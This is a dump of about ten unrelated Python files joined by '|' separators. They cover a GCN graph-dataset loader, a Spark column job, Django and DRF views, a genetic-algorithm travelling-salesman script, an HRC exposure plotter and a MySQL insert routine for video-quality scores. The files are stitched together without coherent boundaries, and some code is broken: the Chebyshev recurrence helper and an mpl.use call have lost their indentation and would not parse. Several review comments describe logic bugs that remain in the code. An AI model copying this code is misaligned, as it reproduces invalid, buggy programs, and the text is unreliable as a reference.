        # Note that these ds are using the ids and not the raw strings read from the file.
        self.label_to_node_map = {}
        self.node_to_label_map = {}
        self.edge_count = -1
    def read_labels(self, label_data_path):
        '''
        Method to read the lables from `data_path`.

        Expects one "<node> <label>" pair per line; populates the node/label
        id maps, the node<->label maps and the k-hot `self.labels` matrix.
        '''
        print("Reading labels from", str(label_data_path))
        data = np.genfromtxt(label_data_path, dtype=np.dtype(str))
        # Assign dense integer ids to the distinct labels and nodes.
        label_to_id_map = {label: id for id, label in enumerate(
            set(
                list(
                    map(lambda _data: _data[1], data)
                )
            )
        )}
        node_to_id_map = {node: id for id, node in enumerate(
            set(
                list(
                    map(lambda _data: _data[0], data)
                )
            )
        )}
        node_to_label_map = {}
        label_to_node_map = {}
        for node, label in map(lambda _data: (node_to_id_map[_data[0]], label_to_id_map[_data[1]]), data):
            if node not in node_to_label_map:
                node_to_label_map[node] = set()
            node_to_label_map[node].add(label)
            if label not in label_to_node_map:
                label_to_node_map[label] = set()
            label_to_node_map[label].add(node)
        label_count = len(label_to_id_map.keys())
        # k-hot encode each node's label set.
        # NOTE(review): rows follow the insertion order of node_to_label_map
        # (file order), not node-id order — confirm downstream consumers
        # index `labels` consistently with that order.
        labels = np.asarray(list(
            map(lambda index_set: map_set_to_khot_vector(index_set=index_set, num_classes=label_count)
                , node_to_label_map.values())
        ))
        # NOTE(review): these asserts compare the *instance* maps, which are
        # still the empty dicts from __init__ at this point (the locals are
        # assigned to self further down), so both checks trivially pass —
        # they likely meant to check the local maps.
        assert (len(self.id_to_node_map.keys()) == len(self.node_to_label_map.keys())), \
            "Some nodes are missing labels or ids"
        assert (len(self.id_to_label_map.keys()) == len(self.label_to_node_map.keys())), \
            "Some labels are missing nodes or ids"
        node_count = labels.shape[0]
        label_count = labels.shape[1]
        # Updating all the class variables in one place
        self.label_to_id_map = label_to_id_map
        self.node_to_id_map = node_to_id_map
        self.node_to_label_map = node_to_label_map
        self.label_to_node_map = label_to_node_map
        self.id_to_label_map, self.id_to_node_map = list(
            map(lambda _dict: invert_dict(_dict), [
                label_to_id_map, node_to_id_map
            ])
        )
        self.labels = labels
        print("{} nodes read.".format(node_count))
        print("{} labels read.".format(label_count))
    def read_features(self, feature_data_path, one_hot=False, dim=100):
        '''
        Method to read the features from `feature_data_path`.

        Falls back to identity (one_hot) or random features when no path is
        given. Must be called after read_labels (uses id_to_node_map).
        '''
        # Check if the `feature_data_path` is set else generate default feature vectors
        node_count = len(self.id_to_node_map.keys())
        if (feature_data_path):
            features = np.genfromtxt(feature_data_path, dtype=np.dtype(str))
            # NOTE(review): values are parsed as floats but stored as int32 —
            # fractional features would be truncated; confirm intended.
            features = np.asarray(
                list(map(map_list_to_floats, features[:, 1:])), dtype=np.int32)
            if self.sparse_features:
                features = sp.csr_matrix(features)
        else:
            if (one_hot):
                # In case of one_hot features, we ignore the set value of `dim` and use dim = node_count.
                dim = node_count
                # NOTE(review): the assert message is missing its {} placeholder.
                assert (dim > 0), "node count = ".format(dim)
                if self.sparse_features:
                    features = sp.identity(dim).tocsr()
                else:
                    features = sp.identity(dim).todense()
            else:
                features = np.random.uniform(low=0, high=0.5, size=(node_count, dim))
        assert (features.shape[0] == node_count), "Missing features for some nodes"
        self.features = features
        print("{} features read for each node.".format(self.features.shape[1]))
    def read_data(self, data_dir=None, dataset_name=None):
        '''
        Method to read the data corresponding to `dataset_name` from `data_dir`
        :return:
        Populates self.features, self.adjacency_matrix, self.labels

        Expects network.txt, label.txt and feature.txt inside
        <data_dir>/<dataset_name>. Labels must be read first so node ids
        exist for features and the network.
        '''
        data_path = os.path.join(data_dir, dataset_name)
        print("Reading data from", str(data_path))
        data_path_map = {}
        data_path_map[NETWORK] = os.path.join(data_path, "network.txt")
        data_path_map[LABEL] = os.path.join(data_path, "label.txt")
        data_path_map[FEATURE] = os.path.join(data_path, "feature.txt")
        self.read_labels(label_data_path=data_path_map[LABEL])
        self.read_features(feature_data_path=data_path_map[FEATURE])
        self.read_network(network_data_path=data_path_map[NETWORK])
    @abstractmethod
    def read_network(self, network_data_path):
        '''
        Method to read the network from `network_data_path`
        '''
        pass
    def compute_supports(self, model_params, adj=None):
        '''
        Method to compute the supports for the graph before feeding to the model.

        Returns a list of support matrices: Chebyshev polynomials for
        GCN_POLY, otherwise a single renormalised adjacency.
        '''
        if(adj is None):
            adj = self.adj
        if(model_params.model_name==GCN_POLY):
            supports = compute_chebyshev_polynomial(adj, degree=model_params.support_size - 1)
        else:
            # GCN, GCN_AE
            supports = [transform_adj(adj=adj, is_symmetric=True)]
        return supports
    def get_node_mask(self, dataset_splits):
        '''Method to obtain the train, validation and test masks for nodes (labels).

        `dataset_splits` are relative weights and are normalised to sum to 1.
        NOTE(review): `self.node_size` is not defined in this class — it is
        presumably set by a subclass. Also, the restart indices for the val
        and test ranges use int(n * split[i]) instead of a cumulative offset,
        so the ranges overlap — confirm before relying on disjoint splits.
        '''
        dataset_splits_sum = sum(dataset_splits)
        dataset_splits = list(map(lambda x: x / dataset_splits_sum, dataset_splits))
        current_index = 0
        train_index = np.arange(current_index, current_index + int(self.node_size * dataset_splits[0]))
        current_index = int(self.node_size * dataset_splits[0])
        val_index = np.arange(current_index, current_index + int(self.node_size * dataset_splits[1]))
        current_index = int(self.node_size * dataset_splits[1])
        test_index = np.arange(current_index, current_index + int(self.node_size * dataset_splits[2]))
        return train_index, val_index, test_index
    def get_edge_mask(self, dataset_splits, adj = None, shuffle_data = True):
        '''Method to obtain the train, validation and test mask for edges.

        Splits the (undirected) edge set into train/val/test, samples an equal
        number of negative edges for val/test, and rebuilds a symmetric
        adjacency matrix from the training edges for the autoencoder loss.
        '''
        dataset_splits_sum = sum(dataset_splits)
        dataset_splits = list(map(lambda x: x / dataset_splits_sum, dataset_splits))
        if(adj is None):
            adj = self.adj
        # We first remove the diagonal elements as we do not want to predict self-connections.
        # NOTE(review): `adj - adj.diagonal()` subtracts the diagonal *vector*
        # from every row (broadcast), not just the diagonal entries — a
        # sp.diags-based subtraction was probably intended; confirm.
        adj = sp.csr_matrix(adj - adj.diagonal())
        adj.eliminate_zeros()
        # Since we assume the graph to be undirected, we do not need to keep the entire graph
        adj_triangular = sp.triu(adj, k=0)
        node_count = self.adj.shape[0]
        edges_list = list(zip(adj_triangular.row, adj_triangular.col))
        edges_set = set(edges_list)
        edges = np.asarray(edges_list)
        edges_count = int(edges.shape[0])
        train_edges_count = int(edges_count * dataset_splits[0])
        validation_edges_count = int(edges_count * dataset_splits[1])
        test_edges_count = edges_count - train_edges_count - validation_edges_count
        edges_index = list(range(edges_count))
        if(shuffle_data):
            np.random.shuffle(edges_index)
        train_edges_index = edges_index[:train_edges_count]
        validation_edges_index = edges_index[train_edges_count:train_edges_count+validation_edges_count]
        test_edges_index = edges_index[train_edges_count+validation_edges_count:]
        train_edges = edges[train_edges_index]
        validation_edges = edges[validation_edges_index]
        test_edges = edges[test_edges_index]
        # Negative (non-)edges for evaluation; see sample_negative_edges below.
        edges_negative_sample = sample_negative_edges(required_edges_count=test_edges_count + validation_edges_count,
                                                      true_edges=edges_set,
                                                      node_count=node_count)
        validation_edges_negative_sample = np.asarray(edges_negative_sample[:validation_edges_count])
        test_edges_negative_sample = np.asarray(edges_negative_sample[validation_edges_count:])
        train_index = train_edges
        val_index = np.concatenate((validation_edges, validation_edges_negative_sample))
        test_index = np.concatenate((test_edges, test_edges_negative_sample))
        # We would pass along the adjacency matrix of train_index for the autoencoder loss
        # We need to make sure that the new adjacency matrix is of the same dimension as the original one
        data = np.ones(train_index.shape[0])
        adj_ae = sp.csr_matrix((data, (train_index[:, 0], train_index[:, 1])),
                               shape=adj.shape)
        # Since so far we considered the graph to be undirected, we need to add back the edges in
        # the other direction as well
        adj_ae = adj_ae + adj_ae.transpose()
        return adj_ae, train_index, val_index, test_index
def symmetic_adj(adj):
    '''
    Symmetrise the sparse adjacency matrix `adj`.
    :return: matrix with both (i, j) and (j, i) set to max(adj[i,j], adj[j,i])

    Example: [[1, 2], [1, 1]] becomes [[1, 2], [2, 1]].
    '''
    transposed = adj.T
    # Wherever the transposed entry is larger, swap it in for the original.
    larger = transposed > adj
    return adj + transposed.multiply(larger) - adj.multiply(larger)
def transform_adj(adj, is_symmetric=True):
    '''
    Transform the adjacency matrix as described in section 2 of
    https://arxiv.org/abs/1609.02907: add self-connections, then apply the
    renormalization trick.
    '''
    with_self_loops = adj + sp.eye(adj.shape[0])
    return renormalization_trick(with_self_loops, is_symmetric)
def renormalization_trick(adj, symmetric=True):
    '''
    Degree-normalise the adjacency matrix (Kipf & Welling renormalisation).

    :param adj: sparse adjacency matrix (rows assumed to have nonzero degree)
    :param symmetric: if True return D^-1/2 . A . D^-1/2, else D^-1 . A
    :return: normalised matrix in CSR format
    '''
    if symmetric:
        # dii = sum_j(aij)
        # dii = dii ** -o.5
        d = sp.diags(
            np.power(np.asarray(adj.sum(1)), -0.5).flatten(),
            offsets=0)
        # dii . adj . dii
        return adj.dot(d).transpose().dot(d).tocsr()
    # BUG FIX: the non-symmetric branch was missing, so symmetric=False
    # silently returned None. Apply row normalisation D^-1 . A instead.
    d = sp.diags(np.power(np.asarray(adj.sum(1)), -1.0).flatten(), offsets=0)
    return d.dot(adj).tocsr()
def get_identity(size):
    '''Return a sparse identity matrix of the given size.'''
    return sp.identity(size)
def compute_chebyshev_polynomial(adj, degree):
    '''Method to compute Chebyshev Polynomial upto degree `degree`.

    Returns the list [T_0, T_1, ..., T_degree] evaluated on the rescaled
    normalised Laplacian, as used by ChebNet-style GCNs.
    '''
    adj_normalized = renormalization_trick(adj=adj)
    identity_size = adj.shape[0]
    # laplacian_normalized = In - adj_normalized
    laplacian_normalized = get_identity(identity_size) - adj_normalized
    # Largest-magnitude eigenvalue, used to rescale the spectrum into [-1, 1].
    eigval, _ = eigsh(A = laplacian_normalized, k = 1, which="LM")
    # L = 2L/lamba_max - In
    laplacian_normalized_scaled = (2.0 * laplacian_normalized)/eigval[0] - get_identity(identity_size)
    Tk = [get_identity(identity_size), laplacian_normalized_scaled]
    # Chebyshev recurrence: T_k = 2 X T_{k-1} - T_{k-2}
    for i in range(2, degree+1):
        Tk.append(_compute_chebyshev_recurrence(current = Tk[-1],
                                                previous = Tk[-2],
                                                X = laplacian_normalized_scaled))
    return Tk
def _compute_chebyshev_recurrence(current, previous, X):
'''Method to compute the next term of the Chebyshev recurrence'''
next = 2 * X.dot(current) - previous
return next
def sample_negative_edges(required_edges_count, true_edges, node_count):
    '''Rejection-sample `required_edges_count` node pairs that are not edges.

    :param required_edges_count: number of negative samples wanted
    :param true_edges: set of (i, j) pairs that are real edges (either order)
    :param node_count: nodes are drawn uniformly from [0, node_count)
    :return: list of sampled (i, j) pairs
    '''
    sampled = set()
    while len(sampled) < required_edges_count:
        # randomly sample two nodes
        u = np.random.randint(0, node_count)
        v = np.random.randint(0, node_count)
        if u == v:
            continue  # self-connection, so ignore
        if ((u, v) in true_edges) or ((v, u) in true_edges):
            continue  # true edge, so ignore
        if ((u, v) in sampled) or ((v, u) in sampled):
            continue  # already added, so ignore
        sampled.add((u, v))
    return list(sampled)
|
# Emit the count followed by that many 'a' characters (no trailing newline).
print(200000)
# PERF FIX: build the string once and write it in a single call instead of
# issuing 200000 separate print() calls.
print('a' * 200000, end='')
|
#!/bin/python3
from __future__ import print_function
import sys
from operator import add
from pyspark.sql import SparkSession
if __name__ == "__main__":
    # Usage: zad6 <file> <col_name> [<col_name_2> ...]
    if len(sys.argv) < 3:
        print("Usage: zad6 <file> <col_name> [<col_name_2>...<col_name_n.]", file=sys.stderr)
        # FIX: use sys.exit — the `exit` builtin comes from the site module
        # and is not guaranteed to exist in every interpreter invocation.
        sys.exit(-1)
    spark = SparkSession\
        .builder\
        .appName("Select columns")\
        .getOrCreate()
    # Join the requested column names into one space-terminated argument
    # string (replaces the manual accumulation loop).
    columns = "".join(col + " " for col in sys.argv[2:])
    lines = spark.read.text(sys.argv[1]).rdd.map(lambda r: r[0])
    # Stream the lines through the external map/reduce scripts.
    countsR = lines.pipe('python3 ./mapper_z6.py ' + columns)\
        .pipe('python3 ./reducer_z6.py')
    for line in countsR.collect():
        print(line)
    spark.stop()
from django.shortcuts import render
# Create your views here.
def homeview(request):
    """Render index.html with a greeting under the context key 'quest'."""
    context = {'quest': "Hello"}
    return render(request, "index.html", context)
import random
import math
import turtle
import copy
from functools import *
def generate_map_point(x_range, y_range, loc):
    """Return a uniformly random (x, y) point in [-x_range, x_range] x [-y_range, y_range].

    `loc` is the location index supplied by the caller; it does not affect the result.
    """
    x = random.randint(-(x_range), x_range)
    y = random.randint(-(y_range), y_range)
    return (x, y)
def generate_map_points(x_range, y_range, locations):
    """Generate a list of `locations` random map points."""
    return [generate_map_point(x_range, y_range, loc) for loc in range(locations)]
def generate_map_routes(map_points, total_routes):
    """Return `total_routes` independently shuffled copies of `map_points`.

    The input list is deep-copied, so the caller's points are untouched.
    """
    routes = []
    for route_idx in range(total_routes):
        print("map route: " + str(route_idx))
        routes.append(copy.deepcopy(map_points))
        random.shuffle(routes[route_idx])
    return routes
def calculate_distance(starting_x, starting_y, destination_x, destination_y):
    """Euclidean distance between the starting and destination points."""
    return math.hypot(destination_x - starting_x, destination_y - starting_y)
def calculate_path(map_points):
    """Total length of the closed tour visiting `map_points` in order.

    Sums consecutive segment lengths, then adds the return leg from the
    last point back to the first.
    """
    total = 0
    idx = 0
    while idx + 1 < len(map_points):
        total += math.hypot(map_points[idx + 1][0] - map_points[idx][0],
                            map_points[idx + 1][1] - map_points[idx][1])
        idx += 1
    # close the loop: last point back to the first
    total += math.hypot(map_points[0][0] - map_points[idx][0],
                        map_points[0][1] - map_points[idx][1])
    return total
def fitness_function(map_routes,best_solution):
    """Rank candidate routes by total closed-tour length.

    :param map_routes: list of routes (each a list of (x, y) points)
    :param best_solution: effectively ignored — overwritten immediately below
    :return: map_routes sorted by tour length, longest first
    """
    # NOTE(review): the parameter is clobbered here, and the best_* locals
    # computed in the loop are never returned.
    best_solution = copy.deepcopy(map_routes[0])
    best_solution_score = 0
    ranking = []
    for x in range(len(map_routes)):
        score = 0
        score += calculate_path(map_routes[x])
        ranking.append(score)
        if score > best_solution_score:
            best_solution = x
            best_solution_score = score
    # NOTE(review): reverse=True places the *longest* route first; for a TSP
    # fitness ranking shortest-first is usually wanted — confirm intent
    # before "elite" selection in mating_function uses index 0.
    sorted_map_routes = [x for _,x in sorted(zip(ranking,map_routes), reverse=True)]
    return sorted_map_routes
def mating_function(map_routes, mutation_rate, elite_threshold):
    """Produce the next generation by breeding each route with an elite parent.

    :param map_routes: routes ranked by fitness_function (best first)
    :param mutation_rate: per-position swap probability passed to mutate()
    :param elite_threshold: fraction of the population eligible as parent_1
    :return: new list of child routes, one per input route
    """
    new_map_routes = []
    for x in map_routes:
        # NOTE(review): randint's upper bound is inclusive, so this can pick
        # index int(len*threshold) itself — one past the intended elite slice.
        parent_1 = copy.deepcopy(map_routes[random.randint(0,int(len(map_routes)*elite_threshold))])
        parent_2 = copy.deepcopy(x)
        mutated_child = mutate(breed(parent_1,parent_2),mutation_rate)
        new_map_routes.append(mutated_child)
    # debug dump of the whole new population
    print(new_map_routes)
    return new_map_routes
def breed(parent_1, parent_2):
    """Create a child route by sampling genes from both parents.

    A random cut fraction decides how many genes come from parent_1; the
    complementary fraction comes from parent_2.

    BUG FIX: the loop counter `x` was never incremented, so both while loops
    spun forever; the counters now advance (and are reset between loops), and
    the unused `cut_points`/`child` locals were removed.

    NOTE(review): random.choice sampling can duplicate or drop cities, so the
    child is not guaranteed to be a permutation of the parents.
    """
    random_cut = random.uniform(0, 1)
    rest_cut = 1 - random_cut
    dna_1 = []
    dna_2 = []
    x = 0
    while x <= (len(parent_1) * random_cut):
        dna_1.append(random.choice(parent_1))
        x += 1
    x = 0
    while x <= (len(parent_2) * rest_cut):
        dna_2.append(random.choice(parent_2))
        x += 1
    return dna_1 + dna_2
def mutate(child, mutation_rate):
    """Randomly swap pairs of cities in `child`, in place, and return it.

    :param child: route (list) to mutate
    :param mutation_rate: probability, per position, of swapping with a
        random other position
    :return: the full mutated route

    BUG FIXES:
    - random.random() takes no arguments; the old random.random(0, 1) call
      raised TypeError on every invocation.
    - the old code appended only the swapped elements to the result, so the
      returned "route" silently dropped most cities; the complete route is
      returned now.
    """
    for x in range(len(child)):
        if random.random() < mutation_rate:
            y = random.randint(0, len(child) - 1)
            # swap positions x and y
            child[x], child[y] = child[y], child[x]
    return child
print("Welcome to salesman problem program \o/")
#print(mating_function((fitness_function(generate_map_routes((generate_map_points(50, 50, 10)),3),0),(generate_map_routes((generate_map_points(50, 50, 10)),3),0))0.5,0.1))
# Run one GA generation: 3 random routes over 10 random points in a
# 50x50 area, ranked by fitness_function, then bred/mutated.
print(mating_function(fitness_function((generate_map_routes((generate_map_points(50, 50, 10)),3)),0),0.5,0.1))
#(generate_map_routes((generate_map_points(50, 50, 10)),3))
|
def update_dictionary(d, key, value):
    """Append `value` to d[key] if present, otherwise to d[2*key].

    If neither key nor 2*key exists, a new list is created under 2*key.
    Mutates `d` in place and returns None.
    """
    existing = d.get(key)
    if existing is not None:
        existing.append(value)
        return
    doubled = d.get(2 * key)
    if doubled is None:
        d[2 * key] = [value]
    else:
        doubled.append(value)
d = {}
# Demonstration: update_dictionary mutates d in place and returns None.
print(update_dictionary(d, 1, -1))
print(d)
update_dictionary(d, 2, -2)
print(d)
update_dictionary(d, 1, -3)
print(d)
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#########################################################################################
# #
# hrc_dose_plot_exposure_stat.py: plotting trendings of avg, min, max, 1 sigma #
# 2 sigma, and 3 sigma trends #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 09, 2021 #
# #
#########################################################################################
import sys
import os
import string
import re
import copy
import numpy as np
import time
#
#--- pylab plotting routine related modules
#
import matplotlib as mpl
if __name__ == '__main__':
mpl.use('Agg')
from pylab import *
import matplotlib.pyplot as plt
import matplotlib.font_manager as font_manager
import matplotlib.lines as lines
#
#--- reading directory list
#
# Read the house-keeping dir_list file; each line is "<value> : <var_name>"
# and is turned into a module-level variable (e.g. data_out, plot_dir,
# mta_dir, bin_dir).
path = '/data/mta/Script/Exposure/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
    data = [line.strip() for line in f.readlines()]
for ent in data:
    atemp = re.split(':', ent)
    var = atemp[1].strip()
    line = atemp[0].strip()
    # NOTE(review): exec() trusts dir_list completely — anyone who can edit
    # that file can run arbitrary code here.
    exec("%s = %s" %(var, line))
#
#--- append path to a private folder
#
sys.path.append(mta_dir)
sys.path.append(bin_dir)
#
import mta_common_functions as mcf
import exposureFunctions as expf
#--------------------------------------------------------------------------------------------
#--- hrc_dose_plot_exposure_stat: read hrc database, and plot history of exposure ---
#--------------------------------------------------------------------------------------------
def hrc_dose_plot_exposure_stat(indir = 'NA', outdir = 'NA', clean = 'NA'):
    """
    read hrc database, and plot history of exposure.
    input:  indir   --- data directory path ('NA' -> configured data_out)
            outdir  --- output directory path ('NA' -> configured plot_dir)
            clean   --- any value other than 'NA' cleans the data sets first
    output: outdir/<hrc>.png  (one plot per detector: hrci, hrcs)
    """
    #
    #--- setting indir and outdir if not given
    #
    if indir == 'NA':
        indir = data_out
    if outdir == 'NA':
        outdir = plot_dir
    #
    #--- clean up the data sets before reading
    #
    if clean != 'NA':
        expf.clean_data(indir)
    #
    #--- start plotting data
    #
    for detector in ('hrci', 'hrcs'):
        #
        #--- read data
        #
        idata = expf.readExpData(indir, detector)
        #
        #--- plot data
        #
        try:
            plot_hrc_dose(idata)
            #
            #--- trim the edge of the plot and move to the plot directory
            #
            # NOTE(review): `outfile` is assigned but never used, and the
            # convert command writes to plot_dir rather than the `outdir`
            # argument — confirm `outdir` is meant to be honoured here.
            outfile = detector + '.png'
            cmd = 'convert hrc.png -trim ' + plot_dir + detector + '.png'
            os.system(cmd)
            mcf.rm_files('hrc.png')
        except:
            # NOTE(review): bare except silently swallows every plotting
            # error (including typos); at minimum this should be logged.
            pass
#--------------------------------------------------------------------------------------------
#--- plot_hrc_dose: plot 6 panels of hrc quantities. --
#--------------------------------------------------------------------------------------------
def plot_hrc_dose(idata):
    """
    plot 6 panels of hrc quantities.
    input:  idata --- a list of lists of data of:
                      date, amean, amin, amax, accs1, accs2, accs3
                      dmean, dmin, dmax, dff1, dff2, dff3
                      (a* = cumulative, d* = per-period values)
    output: ./hrc.png
    """
    #
    #--- open data
    #
    (date, year, month, amean, astd, amin, amin_pos, \
     amax, amax_pos, accs1, accs2, accs3, dmean, dstd,\
     dmin, dmin_pos, dmax, dmax_pos, dffs1, dffs2, dffs3) = idata
    plt.close('all')
    #
    #---- set a few parameters
    #
    mpl.rcParams['font.size'] = 9
    props = font_manager.FontProperties(size=6)
    plt.subplots_adjust(hspace=0.05)
    plt.subplots_adjust(wspace=0.12)
    #
    #--- mean
    #
    ax1 = plt.subplot(3,2,1)
    plot_panel(date, dmean, 'Average', ax1)
    #
    #--- mean cumulative
    #
    ax2 = plt.subplot(3,2,2)
    plot_panel(date, amean, 'Average Cumulative', ax2)
    #
    #--- max
    #
    ax3 = plt.subplot(3,2,3)
    plot_panel(date, dmax, 'Maximum', ax3)
    #
    #--- max cumulative
    #
    ax4 = plt.subplot(3,2,4)
    plot_panel(date, amax, 'Maximum Cumulative', ax4)
    #
    #--- 68, 95, and 99.6% levels
    #
    labels = ["68% Value ", "95% Value", "99.7% Value"]
    ax5 = plt.subplot(3,2,5)
    plot_three_values(date, dffs1, dffs2, dffs3, labels, ax5)
    #
    #--- 68, 95, and 99.6% cumulative
    #
    ax6 = plt.subplot(3,2,6)
    plot_three_values(date, accs1, accs2, accs3, labels, ax6)
    #
    #--- plot x axis tick label only at the bottom ones
    #
    for ax in ax1, ax2, ax3, ax4, ax5, ax6:
        if ax != ax5 and ax != ax6:
            for label in ax.get_xticklabels():
                label.set_visible(False)
        else:
            pass
    #
    #--- putting axis names
    #
    ax3.set_ylabel('Counts per Pixel')
    ax5.set_xlabel('Year')
    ax6.set_xlabel('Year')
    #
    #--- set the size of the plotting area in inch (width: 10.0in, height 5.0in)
    #
    fig = matplotlib.pyplot.gcf()
    fig.set_size_inches(10.0, 10.0)
    #
    #--- save the plot in png format
    #
    plt.savefig('hrc.png', format='png', dpi=300)
    plt.close('all')
#--------------------------------------------------------------------------------------------
#--- plot_panel: plotting each panel for a given "ax" ---
#--------------------------------------------------------------------------------------------
def plot_panel(x, y, label, ax):
    """
    plotting each panel for a given "ax".
    input:  x     --- a list of x values (assumed sorted ascending)
            y     --- a list of y values
            label --- text label drawn inside the panel
            ax    --- designation of the plot
    output: returning the part of the plot created
    """
    #
    #--- x axis setting: here we assume that x is already sorted
    #
    xmin = x[0]
    xmax = x[len(x) -1]
    diff = xmax - xmin
    # pad by 5% of the span, then round outward to whole years
    xmin = xmin - 0.05 * diff
    xmax = xmax + 0.05 * diff
    xmin = int(xmin)
    xmax = int(xmax) + 1
    # x position for the in-panel text label
    xbot = xmin + 0.05 * diff
    #
    #--- y axis setting
    #
    ymin = min(y)
    ymax = max(y)
    #
    #--- for the case, ymin == ymax,
    #
    if ymin == ymax:
        ymax += 1
    diff = ymax - ymin
    ymin = ymin - 0.01 * diff
    if ymin < 0:
        ymin = 0
    ymax = ymax + 0.1 * diff
    # y position for the in-panel text label (just below the top)
    ytop = ymax - 0.12 * diff
    #
    #--- setting panel
    #
    ax.set_autoscale_on(False) #---- these three may not be needed for the new pylab, but
    ax.set_xbound(xmin,xmax)   #---- they are necessary for the older version to set
    ax.set_xlim(left=xmin, right=xmax, auto=False)
    ax.set_ylim(bottom=ymin, top=ymax, auto=False)
    #
    #--- plot line
    #
    plt.plot(x, y, color='blue', lw=1, marker='+', markersize=1.5)
    plt.text(xbot, ytop, label)
#------------------------------------------------------------------------------------
#--- plot_three_values: plotting three data on a signle panel for a given ax ---
#------------------------------------------------------------------------------------
def plot_three_values(x, s1, s2, s3, labels, ax):
    """
    plotting three data on a signle panel for a given ax
    input:  x      --- a list of x values (assumed sorted ascending)
            s1     --- a list of y values set 1
            s2     --- a list of y values set 2
            s3     --- a list of y values set 3 (assumed the largest; sets the y range)
            labels --- a list of ax labels for the legend
            ax     --- designation of the plot
    output: returning the part of the plot created
    """
    #
    #--- x axis setting: here we assume that x is already sorted
    #
    xmin = x[0]
    xmax = x[len(x) -1]
    diff = xmax - xmin
    # pad by 5% of the span, then round outward to whole years
    xmin = xmin - 0.05 * diff
    xmax = xmax + 0.05 * diff
    xmin = int(xmin)
    xmax = int(xmax) + 1
    xbot = xmin + 0.05 * diff
    #
    #--- y axis setting
    #
    ymin = 0
    ymax = max(s3)
    ymax = 1.1 * ymax
    #
    #--- for the case, ymin == ymax,
    #
    if ymin == ymax:
        ymax += 1
    diff = ymax - ymin
    ymin = ymin - 0.01 * diff
    if ymin < 0:
        ymin = 0
    ytop = 0.88 * ymax
    #
    #--- setting panel
    #
    ax.set_autoscale_on(False) #---- these three may not be needed for the new pylab, but
    ax.set_xbound(xmin,xmax)   #---- they are necessary for the older version to set
    ax.set_xlim(left=xmin, right=xmax, auto=False)
    ax.set_ylim(bottom=ymin, top=ymax, auto=False)
    #
    #--- plot line
    #
    p1, = plt.plot(x, s1, color='blue',  lw=1, marker='', markersize=0.0)
    p2, = plt.plot(x, s2, color='green', lw=1, marker='', markersize=0.0)
    p3, = plt.plot(x, s3, color='orange',lw=1, marker='', markersize=0.0)
    # NOTE: `legend` comes from the `from pylab import *` star import.
    legend([p1, p2, p3], [labels[0], labels[1], labels[2]], loc=2, fontsize=9)
#------------------------------------------------------------------------
if __name__ == '__main__':
    # Run with defaults: indir/outdir fall back to the configured
    # data_out/plot_dir, and clean='NA' skips the data clean-up pass.
    hrc_dose_plot_exposure_stat(clean ='NA')
|
from __future__ import annotations
from rubicon_ml.domain.artifact import Artifact
from rubicon_ml.domain.dataframe import Dataframe
from rubicon_ml.domain.experiment import Experiment
from rubicon_ml.domain.feature import Feature
from rubicon_ml.domain.metric import Metric
from rubicon_ml.domain.parameter import Parameter
from rubicon_ml.domain.project import Project
__all__ = ["Artifact", "Dataframe", "Experiment", "Feature", "Metric", "Parameter", "Project"]
|
from rest_framework.serializers import Serializer
from .models import Employee,EmployeeSerializer
from rest_framework.views import APIView
from rest_framework.viewsets import ModelViewSet
from rest_framework.authentication import BasicAuthentication,SessionAuthentication
from rest_framework.permissions import IsAuthenticated
from .custompermission import MyPermission
class EmployeeViewSet(ModelViewSet):
    """CRUD REST endpoints for Employee, filterable by ?name=<value>.

    Session-authenticated and restricted to logged-in users; the
    commented-out lines record earlier auth/permission experiments.
    """
    queryset=Employee.objects.all()
    serializer_class=EmployeeSerializer
    # enables e.g. /employees/?name=<value> filtering via django-filter
    filterset_fields=['name']
    #authentication_classes=[BasicAuthentication]
    #permission_classes=[IsAuthenticated]
    #permission_classes=[MyPermission]
    authentication_classes=[SessionAuthentication]
    permission_classes=[IsAuthenticated]
|
"""
Created by hzwangjian1
on 2017-07-25
"""
import json
import os
import traceback
import pymysql
from ddzj.util import db
from alexutil import configutil
from alexutil import dateutil
from alexutil import dbutil
from alexutil import logutil
config_path = os.path.join(os.getcwd(), "config")
log_path = os.path.join(os.getcwd(), "info.log")
logger = logutil.LogUtil(log_path)
# Online MySQL connection settings, read from the [dbonline] section of ./config.
online_host = configutil.get_value(config_path, "dbonline", "host")
online_port = int(configutil.get_value(config_path, "dbonline", "port"))
online_user = configutil.get_value(config_path, "dbonline", "user")
online_pass = configutil.get_value(config_path, "dbonline", "pass")
con_params = dict(host=online_host, user=online_user, password=online_pass, # production DB
                  database='recsys', port=online_port, charset='utf8', use_unicode=True)
# Lazily-created shared connection; see get_conn().
conn = None
def insert_video_quality(result_list):
    """
    Insert static video-quality results into the video_quality_nlp table.
    :param result_list: list of dicts, one per video, holding the fields
        referenced below (doc_id, total_score, duration, ...)
    :return: None
    """
    # try:
    with dbutil.get_connect_cursor(**con_params) as (conn, cursor):
        date_str = dateutil.current_date_format()
        # 7,9,3
        # `insert ignore` silently skips rows whose docid already exists.
        sql='''
        insert ignore into video_quality_nlp(docid, quality_score, quality_level, no_audio, category, duration, mpix_unit_time,
        video_level, bit_rate, tid_level, definition, big_img, video_height, video_width, fm, resolution,
        blackedge, insert_day, others, title_cheat, content_richness, content_serverity_value, qr_code)
        values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)
        '''
        tuple_list = []
        for result in result_list:
            # extra per-video diagnostics are packed into a JSON "others" column
            other_info = {'player_black_edge':result['player_black_edge'], 'cnn_title_cheat':result['cnn_title_cheat'],'kw_title_cheat':result['kw_title_cheat']}
            tuple_list.append((result['doc_id'], result['total_score'], result['total_score_level'], result['no_audio'], result['category'],
                               result['duration'], result['mpix_unit_time'], result['video_level'], result['bit_rate'], result['tid_level'],
                               result['definition'], result['contain_big_image'], result['video_height'], result['video_width'],
                               result['norm_mean_resolution'], result['resolution'], result['content_black_box_type'],
                               date_str,json.dumps(other_info), result['title_cheat'], result['static_video'], result['sansu_value'], result['qr_code']))
        cursor.executemany(sql, tuple_list)
        conn.commit()
    # except Exception as e:
    #     logger.error(e)
    #     traceback.print_exc()
    #     logger.error(traceback.format_exc())
def get_docid_from_videoarticle(start_time, end_time):
    """
    Fetch docids of articles inserted into video_article between
    start_time (inclusive) and end_time (exclusive).
    :param start_time: datetime string, e.g. '2017-08-08 00:00:00'
    :param end_time: datetime string
    :return: list of docid strings (empty on query failure)
    """
    docid_list = []
    with dbutil.connect(**con_params) as conn:
        try:
            with conn.cursor() as cursor:
